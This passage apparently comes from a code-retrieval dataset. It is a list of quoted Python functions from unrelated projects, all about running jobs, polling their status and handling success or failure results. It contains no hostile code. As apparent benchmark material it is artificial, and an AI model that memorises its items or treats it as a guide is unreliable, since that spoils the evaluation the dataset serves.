job.user_message = 'Task completed! Preprocess is available'\n job.save()\n\n else:\n # Didn't work so well\n job.set_state_failure(ye_task.result['message'])\n job.save()\n\n ye_task.forget()\n return True\n\n elif ye_task.state == STATE_FAILURE:\n job.set_state_failure('ye_task failed....')\n job.save()\n ye_task.forget()\n return True\n\n return False\n \"\"\"", "def _handle_result(self, result):\n if self.result_callback != None:\n #Call the result callback but expect failure.\n try:\n self.result_callback(result, self.rpcclient)\n except Exception as ex:\n self.log.failure(\"Error in result handler for '{cmd!r}'.\",cmd=self.command)\n else:\n #If no handler is set, all we do is log.\n self.logg.error(\"Error: no on_result defined for '{cmd!r}' command result: {res!r}.\",cmd=self.command,res=result)", "def _check_for_finished_job(self):\n raise NotImplementedError", "def some_job():\r\n\tfor row in rows:\r\n\t\treceipt_number = row[0]\r\n\t\tphone_number = row[2]\r\n\t\treturn case_status_check(receipt_number, phone_number)", "def execute(self, job):\n raise NotImplementedError", "def test_java_job_result(self):\n test_app = self._create_app()\n class_path = \"spark.jobserver.JavaHelloWorldJob\"\n job = self._create_job(test_app, class_path,\n ctx=self._get_functional_java_context())\n time.sleep(3)\n self._wait_till_job_is_done(job)\n job = self.client.jobs.get(job.jobId)\n self.assertEqual(\"FINISHED\", job.status)\n self.assertEqual(\"Hi!\", job.result)", "def my_job_func(*, mustfail):\n\n if mustfail:\n raise RuntimeError('Job failed, as requested!')\n\n return {\n 'message': 'Job well done!',\n 'payload': {'coolstuff': 'here'},\n 'readiness': 1.0\n }", "def jobSuccess(self, jobReport):\n\n\n\n jobName = None\n try:\n\n #// Invoke job report handler with jobReport location and flag to enable/disable 
merge job report handling\n\n handler = ReportHandler(jobReport, int(self.args['MaxInputAccessFailures']), enableMergeHandling=self.enabled)\n jobName = handler()\n logging.info('this is jobname'+ str(jobName))\n except Exception, ex:\n msg = \"Failed to handle job report from job:\\n\"\n msg += \"%s\\n\" % jobReport\n msg += str(ex)\n msg += \"\\n\"\n msg += traceback.format_exc()\n logging.error(msg)\n\n #// Failed to read job report\n if jobName is None:\n return\n\n # files can be cleaned up now\n logging.info(\"trigger cleanup for: %s\" % jobName)\n\n try:\n self.trigger.setFlag(\"cleanup\", jobName, \"MergeAccountant\")\n except (ProdAgentException, ProdException):\n logging.error(\"trying to continue processing success event\")\n\n\n\n\n return #// END jobSuccess", "def _doWork(self) -> bool:\n # grab a job from queur\n self.lock.acquire ()\n jobId = self.nextJob\n self.nextJob = jobId + 1\n self.lock.release ()\n\n # abort if no jobs are left\n if jobId >= len (self.jobs):\n return False\n\n # execute job\n job = self.jobs[jobId]\n lc = job[\"description\"]\n if self.progressCallback != None:\n self.lock.acquire ()\n self.progressCallback (lc, self.executedJobs, len (self.jobs))\n self.lock.release ()\n else:\n print (lc + \" (\" + str (jobId) + \" / \" + str (len (self.jobs)) + \")\\n\")\n if job[\"runner\"] (job) == False:\n return False\n self.executedJobs = self.executedJobs + 1\n\n # continue on jobs\n return True", "def store(self, job, result):\n pass", "def run_job(job, interrupt_if_necessary):", "def test_jobs_are_updated_on_audit_success(self, mock_run_audit):\n fake_job_pk = 1\n\n # Call the task\n process_job(fake_job_pk) # magic number\n\n # Check if update_job was called with a success indicator\n self.mock_update_job.assert_called_once_with(\n fake_job_pk,\n success=True,\n report_path=mock_run_audit.return_value\n )", "def _job_was_successful(self, status):\n success = True\n\n # https://cloud.google.com/life-sciences/docs/reference/rest/v2beta/Event\n for event in status[\"metadata\"][\"events\"]:\n\n logger.debug(event[\"description\"])\n\n # Does it always result in fail for other failure reasons?\n if \"failed\" in event:\n success = False\n action = event.get(\"failed\")\n logger.debug(\"{}: {}\".format(action[\"code\"], action[\"cause\"]))\n\n elif \"unexpectedExitStatus\" in event:\n action = event.get(\"unexpectedExitStatus\")\n\n if action[\"exitStatus\"] != 0:\n success = False\n\n # Provide reason for the failure (desc includes exit code)\n msg = \"%s\" % event[\"description\"]\n if \"stderr\" in action:\n msg += \": %s\" % action[\"stderr\"]\n logger.debug(msg)\n\n return success", "def success(self, result):\r\n raise NotImplementedError", "def codepipeline_success(job_id):\n try:\n codepipeline = boto3.client('codepipeline')\n codepipeline.put_job_success_result(jobId=job_id)\n LOGGER.info('===SUCCESS===')\n return True\n except ClientError as err:\n LOGGER.error(\"Failed to PutJobSuccessResult for CodePipeline!\\n%s\", err)\n return False", "def result_success(result):\n\n if 200 <= result < 300:\n return True\n\n return False", "def handle_completed_job(job, job_set, event_list):\n if not job.postvalidate():\n event_list = push_event(\n event_list,\n '{} completed but doesnt have expected output'.format(job.get_type()))\n job.status = JobStatus.FAILED\n\n if job.get_type() == 'coupled_diagnostic':\n img_dir = 'coupled_diagnostics_{casename}-obs'.format(\n casename=job.config.get('test_casename'))\n img_src = os.path.join(\n 
job.config.get('coupled_project_dir'),\n img_dir)\n setup_local_hosting(job, event_list, img_src)\n elif job.get_type() == 'amwg_diagnostic':\n img_dir = 'year_set_{year}{casename}-obs'.format(\n year=job.config.get('year_set'),\n casename=job.config.get('test_casename'))\n img_src = os.path.join(\n job.config.get('test_path_diag'),\n '..',\n img_dir)\n setup_local_hosting(job, event_list, img_src)\n elif job.get_type() == 'uvcmetrics':\n img_src = os.path.join(job.config.get('--outputdir'), 'amwg')\n setup_local_hosting(job, event_list, img_src)\n job_set_done = True\n for job in job_set.jobs:\n if job.status != JobStatus.COMPLETED:\n job_set_done = False\n break\n if job.status == JobStatus.FAILED:\n job_set.status = SetStatus.FAILED\n return\n if job_set_done:\n job_set.status = SetStatus.COMPLETED", "def test_execute_monitor_job_success():\n response_queue = queue.Queue()\n message = FakeMessage()\n message.raw_payload = json.dumps(TestData.JOB_MONITOR_PAYLOAD)\n headers = {\"Content-Type\": \"application/json\"}\n\n with aioresponses() as mocked:\n mocked.get(\n TestData.JOB_MONITOR_URL,\n status=200,\n body=json.dumps(TestData.JOB_1_RUNNING),\n headers=headers,\n )\n mocked.get(\n TestData.JOB_MONITOR_URL,\n status=200,\n body=json.dumps(TestData.JOB_1_SUCCESSFUL),\n headers=headers,\n )\n worker.execute(message, TestData.RECEPTOR_CONFIG, response_queue)\n\n response = response_queue.get()\n assert (response[\"status\"]) == 200\n json_response = json.loads(response[\"body\"])\n assert (json_response[\"status\"]) == \"successful\"\n assert len(json_response[\"artifacts\"].keys()) > 0\n for key in json_response[\"artifacts\"].keys():\n assert key.startswith(TestData.ARTIFACTS_KEY_PREFIX)", "def _launch_job(self, job):\n details = self.sm.get_job_details(job.jobId)\n handler = self.handlers[details[0]['method']]\n type = details[0]['type']\n resultId = details[0]['resultid']\n job.set_phase('EXECUTING')\n job.set_start_time(datetime.utcnow().isoformat())\n job.add_result(resultId, 'http://localhost:8000/%s/%s/results/details' % (type, job.jobId))\n self.sm.update_job(job = job)\n self.threads.append(Future(handler, job.jobId, job))", "def test_successful_job(self, _is_coalesced):\n successful_job = json.loads(BASE_JSON % (SUCCESS, 1433166610, 1, 1433166609))[0]\n self.assertEquals(self.query_api.get_job_status(successful_job), SUCCESS)", "def on_success(self, queue, result):\n if not result:\n # no hook, we need to go on the \"check-events\" mode\n CheckRepositoryEvents.add_job(self.identifier.hget())\n else:\n # we have a hook, stop checking events\n for j in CheckRepositoryEvents.collection(\n queued=1, identifier=self.identifier.hget()).instances():\n j.status.hset(STATUSES.CANCELED)\n\n self.clone(delayed_for=60 * 13 + randint(0, 60 * 4))", "def after_return(self, status, retval, task_id, args, kwargs, einfo):\n self.job_db.update_job_state(self.job_id, status.lower())\n if status == 'FAILURE':\n error_object = { 'job_id': self.job_id, 'job_name': self.name, 'message': self.error }\n self.job_db.add_job_error( self.job_id, error_object )\n\n if self.parent_job_id is not None:\n self._propagate_failure_to_ancestors(self.parent_job_id, error_object)\n self.job_db.close()", "def _call(self, job):\n try:\n job.func(self.manager)\n except KeyboardInterrupt:\n # Do not block on KeyboardInterrupt\n raise\n except Exception as error: # TODO: Be specific\n LOGGER.error('Error while processing job: %s', error)\n self.manager.on_job_error(self, job, error)", "def received_job_from_worker(self, 
arguments, result, worker_name):\n # Find the correct job.\n job = [_i for _i in self._workers[worker_name].active_jobs\n if _i.arguments == arguments]\n if len(job) == 0:\n msg = (\"MASTER: Job %s from worker %i not found. All jobs: %s\\n\" %\n (str(arguments), worker_name,\n str(self._workers[worker_name].active_jobs)))\n raise ValueError(msg)\n if len(job) > 1:\n raise ValueError(\"WTF %i %s %s\" % (\n worker_name, str(arguments),\n str(self._workers[worker_name].active_jobs)))\n job = job[0]\n job.result = result\n\n self._workers[worker_name].active_jobs.remove(job)\n self._workers[worker_name].completed_jobs_count[0] += 1\n self._finished_jobs.append(job)", "def _process_results(self, *args, **kwargs): # noqa: E501\n # Lock before processing results to prevent conflicts\n if not self._acquire_pr_lock():\n return\n\n # Get the future instance\n future = self.future\n\n # Skip if no Future\n if not future:\n return\n\n # Skip processing results if forget\n if self.forget:\n # Clean up client\n self.client.close()\n return\n\n try:\n # Get results using the client\n result = self.client.gather(future)\n except Exception as e:\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n # Clean up client\n self.client.close()\n result = e\n log.warning(\n 'Exception encountered when retrieving results: \"{}\"'.format(str(e))\n )\n\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n\n # Handle custom process results function\n if self.process_results_function:\n # Get the process_results_function in TethysJob and call it with the result retrived\n try:\n result = self.process_results_function(result)\n except Exception as e:\n log.exception(\"Process Results Function Error\")\n self._status = \"ERR\"\n result = str(e)\n\n # Serialize the result\n try:\n self.result = result\n except Exception:\n log.exception(\"Results Serialization Error\")\n self._status = \"ERR\"\n else:\n self._status = \"COM\" if self._status != \"ERR\" else \"ERR\"\n\n # Erase the key to avoid problem with dask recycle key\n self.key = \"\"\n\n # save the results or status in the database\n self.save()\n\n # Clean up client\n self.client.close()\n\n if client_fire_forget:\n client_fire_forget.close()\n\n self._release_pr_lock()", "def test_successful_job(self):\n\n successful_job = json.loads(TREEHERDER_JOB % (\"success\", \"completed\"))\n self.assertEquals(self.query_api.get_job_status(successful_job), SUCCESS)", "def returner(ret):\n job_fun = ret['fun']\n job_fun_escaped = job_fun.replace('.', '_')\n job_id = ret['jid']\n job_minion_id = ret['id']\n job_success = True if ret['return'] else False\n job_retcode = ret.get('retcode', 1)\n index = 'salt-{0}'.format(job_fun_escaped)\n #index = 'salt-{0}-{1}'.format(job_fun_escaped, datetime.date.today().strftime('%Y.%m.%d')) #TODO prefer this? 
#TODO make it configurable!\n\n functions_blacklist = ['saltutil.find_job', 'pillar_items', 'grains_items']\n functions_whitelist = ['test.ping'] # TODO\n\n # Determine doc type, set a hardcoded default at the moment # TODO\n #doc_type = datetime.date.today().strftime('%Y%m%d%H%M%S%f')\n doc_type_version = '2014_7_a' # TODO config option\n\n if job_fun in functions_blacklist and job_fun not in functions_whitelist: #TODO configurable\n log.debug(\n 'Won\\'t push new data to Elasticsearch, job with jid={0} and function={1} which is in the user-defined list of ignored functions'.format(\n job_id, job_fun))\n return\n\n if not job_success: # TODO actually, what is retcode? or job_retcode != 0:\n log.debug('Won\\'t push new data to Elasticsearch, job with jid={0}, job_retcode={1} was not succesful'.format(job_id, job_retcode))\n return\n\n index_exists = __salt__['elasticsearcharbe.index_exists'](index)\n\n if not index_exists:\n # TODO make settings configurable\n index_definition = {'settings': {'number_of_shards': 1, 'number_of_replicas': 0}}\n __salt__['elasticsearcharbe.index_create']('{0}-v1'.format(index), index_definition)\n __salt__['elasticsearcharbe.alias_create']('{0}-v1'.format(index), index)\n #log.warn('Won\\'t push new data to Elasticsearch, index \\'{0}\\' does\\'t exist! You need to create it yourself!'.format(index))\n #return\n\n class UTC(tzinfo):\n def utcoffset(self, dt):\n return timedelta(0)\n\n def tzname(self, dt):\n return 'UTC'\n\n def dst(self, dt):\n return timedelta(0)\n\n utc = UTC()\n\n data = {\n '@timestamp': datetime.now(utc).isoformat(),\n 'success': job_success,\n 'retcode': job_retcode,\n 'minion': job_minion_id, #TODO minion_id\n 'fun': job_fun,\n 'jid': job_id,\n 'data': ret['return'],\n }\n body = json.dumps(data)\n\n ret = __salt__['elasticsearcharbe.document_create'](index=index, doc_type=doc_type_version, body=body)", "def new_result(self, job, update_model=True):\n\t\tif not job.exception is None:\n\t\t\tself.logger.warning(\"job {} failed with exception\\n{}\".format(job.id, job.exception))", "def result(self, job):\n\n assert isinstance(job, six.string_types)\n\n try:\n response = requests.get('{}/api/v1/result/{}'.format(self.URL, job))\n except (Timeout, ConnectionError):\n raise ServiceError('Service unavailable: timeout.', 4)\n\n result = self._validate(response)\n data = result.get('state')\n state = State.from_dict(data) if data else None\n\n if state is not None:\n self.__previous_job = self.__current_job\n self.__current_job = None\n\n return result.get('status'), state", "def CheckIfJobFinished(jobid, numseq, to_email, g_params): # {{{\n bsname = \"job_final_process\"\n path_result = os.path.join(g_params['path_static'], 'result')\n rstdir = os.path.join(path_result, jobid)\n gen_logfile = g_params['gen_logfile']\n gen_errfile = g_params['gen_errfile']\n name_server = g_params['name_server']\n g_params['jobid'] = jobid\n g_params['numseq'] = numseq\n g_params['to_email'] = to_email\n jsonfile = os.path.join(rstdir, f\"{bsname}.json\")\n myfunc.WriteFile(json.dumps(g_params, sort_keys=True), jsonfile, \"w\")\n binpath_script = os.path.join(g_params['webserver_root'], \"env\", \"bin\")\n\n finished_idx_file = \"%s/finished_seqindex.txt\"%(rstdir)\n failed_idx_file = \"%s/failed_seqindex.txt\"%(rstdir)\n py_scriptfile = os.path.join(binpath_script, f\"{bsname}.py\")\n finished_idx_list = []\n failed_idx_list = []\n if os.path.exists(finished_idx_file):\n finished_idx_list = list(set(myfunc.ReadIDList(finished_idx_file)))\n if 
os.path.exists(failed_idx_file):\n failed_idx_list = list(set(myfunc.ReadIDList(failed_idx_file)))\n\n lockname = f\"{bsname}.lock\"\n lock_file = os.path.join(g_params['path_result'], g_params['jobid'],\n lockname)\n\n num_processed = len(finished_idx_list)+len(failed_idx_list)\n if num_processed >= numseq: # finished\n if ('THRESHOLD_NUMSEQ_CHECK_IF_JOB_FINISH' in g_params\n and numseq <= g_params['THRESHOLD_NUMSEQ_CHECK_IF_JOB_FINISH']):\n cmd = [\"python\", py_scriptfile, \"-i\", jsonfile]\n (isSubmitSuccess, t_runtime) = webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n elif not os.path.exists(lock_file):\n bash_scriptfile = f\"{rstdir}/{bsname},{name_server},{jobid}.sh\"\n code_str_list = []\n code_str_list.append(\"#!/bin/bash\")\n cmdline = f\"python {py_scriptfile} -i {jsonfile}\"\n code_str_list.append(cmdline)\n code = \"\\n\".join(code_str_list)\n myfunc.WriteFile(code, bash_scriptfile, mode=\"w\", isFlush=True)\n os.chmod(bash_scriptfile, 0o755)\n os.chdir(rstdir)\n cmd = ['sbatch', bash_scriptfile]\n cmdline = \" \".join(cmd)\n verbose = False\n if 'DEBUG' in g_params and g_params['DEBUG']:\n verbose = True\n webcom.loginfo(\"Run cmdline: %s\"%(cmdline), gen_logfile)\n (isSubmitSuccess, t_runtime) = webcom.RunCmd(cmd, gen_logfile, gen_errfile, verbose)\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"isSubmitSuccess: %s\"%(str(isSubmitSuccess)), gen_logfile)", "def on_background_job(self, event):\n job_cmd = event['Job-Command']\n job_uuid = event['Job-UUID']\n # TEST MIKE\n if job_cmd == 'originate' and job_uuid:\n try:\n status, reason = event.get_body().split(' ', 1)\n except ValueError:\n return\n request_uuid = self.bk_jobs.pop(job_uuid, None)\n if not request_uuid:\n return\n\n # case GroupCall\n if event['variable_plivo_group_call'] == 'true':\n status = status.strip()\n reason = reason.strip()\n if status[:3] != '+OK':\n self.log.info(\"GroupCall Attempt Done for RequestUUID %s (%s)\" \\\n % (request_uuid, reason))\n return\n self.log.warn(\"GroupCall Attempt Failed for RequestUUID %s (%s)\" \\\n % (request_uuid, reason))\n return\n\n # case Call and BulkCall\n try:\n call_req = self.call_requests[request_uuid]\n except KeyError:\n return\n # Handle failure case of originate\n # This case does not raise a on_channel_hangup event.\n # All other failures will be captured by on_channel_hangup\n status = status.strip()\n reason = reason.strip()\n if status[:3] != '+OK':\n # In case ring/early state done, just warn\n # releasing call request will be done in hangup event\n if call_req.state_flag in ('Ringing', 'EarlyMedia'):\n self.log.warn(\"Call Attempt Done (%s) for RequestUUID %s but Failed (%s)\" \\\n % (call_req.state_flag, request_uuid, reason))\n # notify end\n self.log.debug(\"Notify Call success for RequestUUID %s\" % request_uuid)\n call_req.notify_call_end()\n return\n # If no more gateways, release call request\n elif not call_req.gateways:\n self.log.warn(\"Call Failed for RequestUUID %s but No More Gateways (%s)\" \\\n % (request_uuid, reason))\n # notify end\n self.log.debug(\"Notify Call success for RequestUUID %s\" % request_uuid)\n call_req.notify_call_end()\n # set an empty call_uuid\n call_uuid = ''\n hangup_url = call_req.hangup_url\n self.set_hangup_complete(request_uuid, call_uuid,\n reason, event, hangup_url)\n return\n # If there are gateways and call request state_flag is not set\n # try again a call\n elif call_req.gateways:\n self.log.warn(\"Call Failed without Ringing/EarlyMedia for RequestUUID %s - Retrying Now (%s)\" \\\n % 
(request_uuid, reason))\n # notify try a new call\n self.log.debug(\"Notify Call retry for RequestUUID %s\" % request_uuid)\n call_req.notify_call_try()\n elif job_cmd == 'conference' and job_uuid:\n result = event.get_body().strip() or ''\n async_res = self.conf_sync_jobs.pop(job_uuid, None)\n if async_res is None:\n return\n elif async_res is True:\n self.log.info(\"Conference Api (async) Response for JobUUID %s -- %s\" % (job_uuid, result))\n return\n async_res.set(result)\n self.log.info(\"Conference Api (sync) Response for JobUUID %s -- %s\" % (job_uuid, result))", "def _check_result(self, fut, *data):\n return fut", "def _job_succeeded(k8s_ctx: str, k8s_job_file: pathlib.Path, dry_run: bool = False) -> bool:\n if not k8s_job_file.exists():\n raise FileNotFoundError(str(k8s_job_file))\n\n cmd = f'kubectl --context={k8s_ctx} get -f {k8s_job_file} -o json'\n\n if dry_run:\n logging.info(cmd)\n return True\n\n p = safe_exec(cmd)\n if not p.stdout:\n return False\n\n retval = 0\n if not p.stdout:\n return False\n\n json_output = json.loads(p.stdout.decode())\n if 'status' not in json_output:\n return False\n\n final_status = ''\n if 'conditions' in json_output['status'] and len(json_output['status']['conditions']) > 0:\n final_status = json_output['status']['conditions'][0]['type']\n\n if final_status == 'Complete' and 'succeeded' in json_output['status']:\n retval = json_output['status']['succeeded']\n elif final_status == 'Failed' and 'failed' in json_output['status']:\n n = int(json_output['status']['failed'])\n logging.error(f'Job {k8s_job_file} failed {n} time(s)')\n # EB-1236, EB-1243: This exception is not caught anywhere - either catch it in caller,\n # or throw UserReportError instead\n raise RuntimeError(f'Job {k8s_job_file} failed {n} time(s)')\n return int(retval) == 1", "def check_result(f):\n\n def g(self, *args, **kwargs):\n\n if self._results is None:\n raise exceptions.Error(\"Called before `execute`\")\n return f(self, *args, **kwargs)\n\n return g", "def run(self):\n try:\n result = self._exec(*self._args)\n self.job_succeeded.emit(result)\n except Exception as e:\n self.job_failed.emit(e, self._args)", "def test_successful(self):\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 3)\n for entry in result['results']:\n expected = None\n if entry['id'] == self.job1.id:\n expected = self.job1\n elif entry['id'] == self.job2.id:\n expected = self.job2\n elif entry['id'] == self.job3.id:\n expected = self.job3\n else:\n self.fail('Found unexpected result: %s' % entry['id'])\n self.assertEqual(entry['job_type']['name'], expected.job_type.name)\n self.assertEqual(entry['job_type_rev']['job_type']['id'], expected.job_type.id)\n self.assertEqual(entry['is_superseded'], expected.is_superseded)", "def _retrieve_result(self, out):\n try:\n result = self.parallel._backend.retrieve_result_callback(out)\n outcome = dict(status=TASK_DONE, result=result)\n except BaseException as e:\n # Avoid keeping references to parallel in the error.\n e.__traceback__ = None\n outcome = dict(result=e, status=TASK_ERROR)\n\n self._register_outcome(outcome)\n return outcome['status'] != TASK_ERROR", "async def my_job_async(mustfail):\n if mustfail:\n raise RuntimeError('Job failed, as requested!')\n\n return {\n 'message': 'job well done',\n 'payload': {'coolstuff': 'here'},\n 'readiness': 1.0\n }", "def 
handle_event(*, event, backend, retries=0): # noqa: C901\n Backend = import_string(backend) # noqa: N806\n\n try:\n job_app_label, job_model_name, job_pk = Backend.get_job_params(\n event=event\n )\n except EventError:\n logger.warning(\"Event not handled by backend\")\n return\n\n job = get_model_instance(\n pk=job_pk, app_label=job_app_label, model_name=job_model_name\n )\n executor = job.get_executor(backend=backend)\n\n if job.status != job.EXECUTING:\n executor.deprovision()\n raise PriorStepFailed(\"Job is not executing\")\n\n try:\n executor.handle_event(event=event)\n except TaskStillExecuting:\n # Nothing to do here, this will be called when it is finished\n return\n except TaskCancelled:\n job.update_status(status=job.CANCELLED)\n return\n except RetryStep:\n try:\n _retry(\n task=handle_event,\n signature_kwargs={\n \"kwargs\": {\"event\": event, \"backend\": backend}\n },\n retries=retries,\n )\n return\n except MaxRetriesExceededError:\n job.update_status(\n status=job.FAILURE,\n stdout=executor.stdout,\n stderr=executor.stderr,\n error_message=\"Time limit exceeded\",\n )\n raise\n except ComponentException as e:\n job.update_status(\n status=job.FAILURE,\n stdout=executor.stdout,\n stderr=executor.stderr,\n error_message=str(e),\n )\n except Exception:\n job.update_status(\n status=job.FAILURE,\n stdout=executor.stdout,\n stderr=executor.stderr,\n error_message=\"An unexpected error occurred\",\n )\n raise\n else:\n job.update_status(\n status=job.EXECUTED,\n stdout=executor.stdout,\n stderr=executor.stderr,\n duration=executor.duration,\n )\n on_commit(\n parse_job_outputs.signature(**job.signature_kwargs).apply_async\n )", "def process_action_result(self, service):\n logger.info(\"Notified of action result:\\n%s\", pretty_json(service))\n annotations = service.get('annotations', {})\n instance_id = annotations.get('instance_id')\n action_name = annotations.get('action')\n if not instance_id:\n logger.warning(\"Received action result without 'instance_id' annotation\")\n return\n with lock_instance(instance_id):\n instance = self.get_fixture_instance(id=instance_id, verify_exists=False)\n if not instance:\n logger.warning(\"Received action result for instance which does not exist\")\n return\n if not instance.operation:\n # This theoretically could happen if we somehow process the job status twice\n # (e.g. 
one by axops and one by a backup GC process)\n logger.warning(\"%s no longer associated with job %s\", instance, service['id'])\n return\n if service['id'] != instance.operation['id']:\n logger.warning(\"Notified of action result (job: %s) which does not match current operation (job: %s)\", service['id'], instance.operation['id'])\n return\n if not ServiceStatus.completed(service['status']):\n logger.warning(\"Notified of incomplete job %s (status: %s)\", service['id'], service['status'])\n return\n\n logger.info(\"%s completed service %s\", instance, service['id'])\n if service['status'] == ServiceStatus.SUCCESS:\n status_detail_message = \"\"\n if instance.status == InstanceStatus.DELETING:\n status_detail_message = \"Deleted by user {}\".format(service['user'])\n instance.transition_state(Event.ACTION_SUCCESS, status_detail_message)\n elif service['status'] in [ServiceStatus.CANCELLED, ServiceStatus.SKIPPED]:\n if instance.status in [InstanceStatus.CREATING, InstanceStatus.DELETING]:\n # a canceled/skipped job for create/delete is considered create/delete failure\n instance.transition_state(Event.ACTION_FAILURE, \"\")\n else:\n # ignore disable policy for cancelled jobs, simply move it back to 'active' state\n instance.transition_state(Event.ACTION_SUCCESS, \"\")\n else:\n instance.transition_state(Event.ACTION_FAILURE, \"\")\n\n self.set_enabled_from_policy(instance, service['status'], action_name)\n self.update_attributes_from_artifacts(instance, service)\n self._persist_instance_updates(instance)\n\n if instance.status == InstanceStatus.ACTIVE:\n # this fixture made it to active pool so trigger processor\n self.reqproc.trigger_processor()", "def _add_job_data(\n self,\n job: Job,\n ) -> Tuple[str, bool]:\n jid = job.job_id()\n try:\n job_result = job.result()\n self._add_result_data(job_result, jid)\n LOG.debug(\"Job data added [Job ID: %s]\", jid)\n # sets the endtime to be the time the last successful job was added\n self.end_datetime = datetime.now()\n return jid, True\n except Exception as ex: # pylint: disable=broad-except\n # Handle cancelled jobs\n status = job.status()\n if status == JobStatus.CANCELLED:\n LOG.warning(\"Job was cancelled before completion [Job ID: %s]\", jid)\n return jid, False\n if status == JobStatus.ERROR:\n LOG.error(\n \"Job data not added for errored job [Job ID: %s]\\nError message: %s\",\n jid,\n job.error_message(),\n )\n return jid, False\n LOG.warning(\"Adding data from job failed [Job ID: %s]\", job.job_id())\n raise ex", "def v2_runner_on_ok(self, result):\n super(Callback, self).v2_runner_on_ok(result)\n self._store(result, STATUS_OK)", "def handle_result(self) -> Callable[['Request'], 'Request']:\n\n def _handle_result(result: 'Request'):\n \"\"\"\n Function that handles the result when extracted from the request future\n\n :param result: The result returned to the gateway. 
It extracts the request to be returned to the client\n :return: Returns a request to be returned to the client\n \"\"\"\n for route in result.routes:\n if route.executor == GATEWAY_NAME:\n route.end_time.GetCurrentTime()\n\n self._update_end_request_metrics(result)\n\n return result\n\n return _handle_result", "def mark(self, job, status='succeeded'):\n pass", "def run(self):\n\t\tlog = logging.getLogger()\n\t\tsuccess = True\n\t\tself.task[\"custom\"] = str(self.task[\"custom\"])\n\t\tself.db = CuckooDatabase()\n\n\t\t# Generate analysis results storage folder path with current task id.\n\t\tresults_path = CuckooConfig().get_analysis_results_path()\n\t\tsave_path = os.path.join(results_path, str(self.task[\"id\"]))\n\n\t\tif (self.task[\"custom\"] == \"sleep\"):\n\t\t\timport time\n\t\t\t# sleep longer than default timeout of hsn2-cuckoo\n\t\t\ttime.sleep(905)\n\t\t# Additional check to verify that the are not saved results with the\n\t\t# same task ID.\n\t\tif os.path.exists(save_path):\n\t\t\tlog.error(\"There are already stored results for current task \" \\\n\t\t\t\t\t \"with ID %d at path \\\"%s\\\". Abort.\"\n\t\t\t\t\t % (self.task[\"id\"], save_path))\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\t\treturn False\n\n\t\t# Check if target file exists.\n\t\tlog.debug(os.path.exists(self.task[\"custom\"]))\n\t\tif not os.path.exists(self.task[\"custom\"]):\n\t\t\tlog.error(\"Cannot find custom file \\\"%s\\\". Abort.\"\n\t\t\t\t\t % self.task[\"custom\"])\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\t\treturn False\n\n\t\t# Check if target is a directory.\n\t\tif os.path.isdir(self.task[\"custom\"]):\n\t\t\tlog.error(\"Specified target \\\"%s\\\" is a directory. Abort.\"\n\t\t\t\t\t % self.task[\"custom\"])\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\t\treturn False\n\n\t\t# 4. Extract appropriate log archive as mock logs analysis results\n\t\t# Modified _save_results so that it extracts the tar file passed in target\n\t\tself._save_results(self.task[\"custom\"], save_path)\n\n\t\t# 5. 
Update task in database with proper status code.\n\t\tif success:\n\t\t\tself.db.complete(self.task[\"id\"], True)\n\t\telse:\n\t\t\tself.db.complete(self.task[\"id\"], False)\n\t\tlog.info(\"Analyis completed.\")\n\n\t\treturn True", "def _poll_for_new_result(session, job):\n while job['status'] not in (3, 4):\n response = session.get('{}/api/jobs/{}'.format(REDASH_HOST, job['id']))\n job = response.json()['job']\n time.sleep(POLL_INTERVAL)\n\n if job['status'] == 3:\n return job['query_result_id']\n return None", "def run_job(self, job, config=None):\n # TRANSLATORS: %r is the name of the job\n logger.info(_(\"Running %r\"), job)\n func_name = \"run_{}_job\".format(job.plugin.replace('-', '_'))\n try:\n runner = getattr(self, func_name)\n except AttributeError:\n return MemoryJobResult({\n 'outcome': IJobResult.OUTCOME_NOT_IMPLEMENTED,\n 'comment': _('This type of job is not supported'),\n })\n else:\n if self._dry_run and job.plugin not in self._DRY_RUN_PLUGINS:\n return self._get_dry_run_result(job)\n else:\n return runner(job, config)", "def run(self, job_result):\n self.logger.info(f\"Running report\")\n job_result.status = JobResultStatusChoices.STATUS_RUNNING\n job_result.save()\n\n try:\n\n for method_name in self.test_methods:\n self.active_test = method_name\n test_method = getattr(self, self.test_methods[method_name])\n test_method()\n\n if self.failed:\n self.logger.warning(\"Report failed\")\n job_result.status = JobResultStatusChoices.STATUS_FAILED\n else:\n self.logger.info(\"Report completed successfully\")\n job_result.status = JobResultStatusChoices.STATUS_COMPLETED\n\n except Exception as e:\n stacktrace = traceback.format_exc()\n self.log_failure(None, f\"An exception occurred: {type(e).__name__}: {e} <pre>{stacktrace}</pre>\")\n logger.error(f\"Exception raised during report execution: {e}\")\n job_result.set_status(JobResultStatusChoices.STATUS_ERRORED)\n\n job_result.data = self._results\n job_result.completed = timezone.now()\n job_result.save()\n\n # Perform any post-run tasks\n self.post_run()", "def results_checker(result):\n global pool\n global stop_all\n global results\n global jobfiles_global\n global jobwcl\n global job_track\n global result_lock\n global lock_monitor\n global donejobs\n global keeprunning\n global terminating\n try:\n (res, jobf, wcl, usage, wrapnum, pid) = result\n jobfiles_global['outfullnames'].extend(jobf['outfullnames'])\n jobfiles_global['output_putinfo'].update(jobf['output_putinfo'])\n if not terminating:\n del job_track[wrapnum]\n if usage > jobwcl['job_max_usage']:\n jobwcl['job_max_usage'] = usage\n results.append(res)\n # if the current thread exited with non-zero status, then kill remaining threads\n # but keep the log files\n\n if (res != 0 and stop_all) and not terminating:\n if result_lock.acquire(False):\n keeprunning = False\n try:\n # manually end the child processes as pool.terminate can deadlock\n # if multiple threads return with errors\n terminate(save=[pid], force=True)\n for _, (logfile, jobfiles) in job_track.iteritems():\n filemgmt = dynam_load_filemgmt(wcl, None)\n\n if logfile is not None and os.path.isfile(logfile):\n # only update the log if it has not been ingested already\n if not filemgmt.has_metadata_ingested('log', logfile):\n lfile = open(logfile, 'a')\n lfile.write(\"\\n****************\\nWrapper terminated early due to error in parallel thread.\\n****************\")\n lfile.close()\n logfileinfo = save_log_file(filemgmt, wcl, jobfiles, logfile)\n jobfiles_global['outfullnames'].append(logfile)\n 
